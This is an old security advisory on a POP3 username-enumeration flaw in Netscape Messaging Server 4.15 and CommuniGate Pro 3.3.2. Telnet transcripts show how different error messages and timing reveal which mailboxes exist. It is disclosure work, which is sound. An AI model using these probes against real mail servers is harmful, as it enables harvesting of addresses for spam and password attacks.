COMMAND

    Netscape

SYSTEMS AFFECTED

    Netscape Messaging server 4.15

PROBLEM

    Matt Holtz found following.  He's dealing with Netscape  Messaging
    Server (aka Iplanet Messaging server)  4.15p1 (mar 15 2000).   The
    problem is that the POP3  server displays a different message  for
    an authentication error  due to an  invalid password then  for one
    due to an invalid username.  This could be used to "harvest" email
    addresses for spam lists.

    Here is an example: Matt created an account test.user but not  one
    called invalid.user

        [mholtz@ ~]$ telnet someserver.example.com 110
        Trying 172.16.10.107...
        Connected to someserver.example.com (172.16.10.107).
        Escape character is '^]'.
        +OK someserver.example.com POP3 service (Netscape Messaging Server 4.15 Patch 1 (built Mar 15 2000))
        USER test.user
        +OK Name is a valid mailbox
        PASS blah
        -ERR Password incorrect
        quit
        +OK
        Connection closed by foreign host.
        [mholtz@ ~]$ telnet someserver.example.com 110
        Trying 172.16.10.107...
        Connected to someserver.example.com (172.16.10.107).
        Escape character is '^]'.
        +OK someserver.example.com POP3 service (Netscape Messaging Server 4.15 Patch 1 (built Mar 15 2000))
        user invalid.user
        +OK Name is a valid mailbox
        PASS blah
        -ERR User unknown
        quit
        +OK
        Connection closed by foreign host.
        [mholtz@ ~]$

    Fortunately it  does pause  for 1  second after  an authentication
    failure.  Note: this example uses messaging server for solaris 7.

    James Mancini also confirmed  that CommuniGate Pro 3.3.2  exhibits
    the  same  behavior,  but  additionally,  it  does  not  pause  on
    authentication failures for non-existent  accounts.  A 1-2  second
    pause is typical for an existing account, allowing either a timing
    or a parsing method of grabbing accounts.  Post.Office 3.1.2  does
    not appear to suffer from this vulnerability.

        --8<--Sample output follows ----
        +OK host.company.com POP3 server (Post.Office v3.1.2 release (PO203-101c)
        with ZPOP version 1.0) ready Thu, 12 Oct 2000 12:36:06 -0700
        user nobody
        +OK Password required for nobody
        pass nothing
        -ERR Password failed for nobody
        user realuser
        +OK Password required for realuser
        pass nothing
        -ERR Password failed for realuser
        
        
        --8<--Sample output follows ----
        +OK CommuniGate Pro POP3 Server 3.3.2 ready
        user nobody
        +OK please send the PASS
        pass nothing
        -ERR unknown user account
        user realuser
        +OK please send the PASS
        pass nothing
        -ERR incorrect password

SOLUTION

    Nothing yet.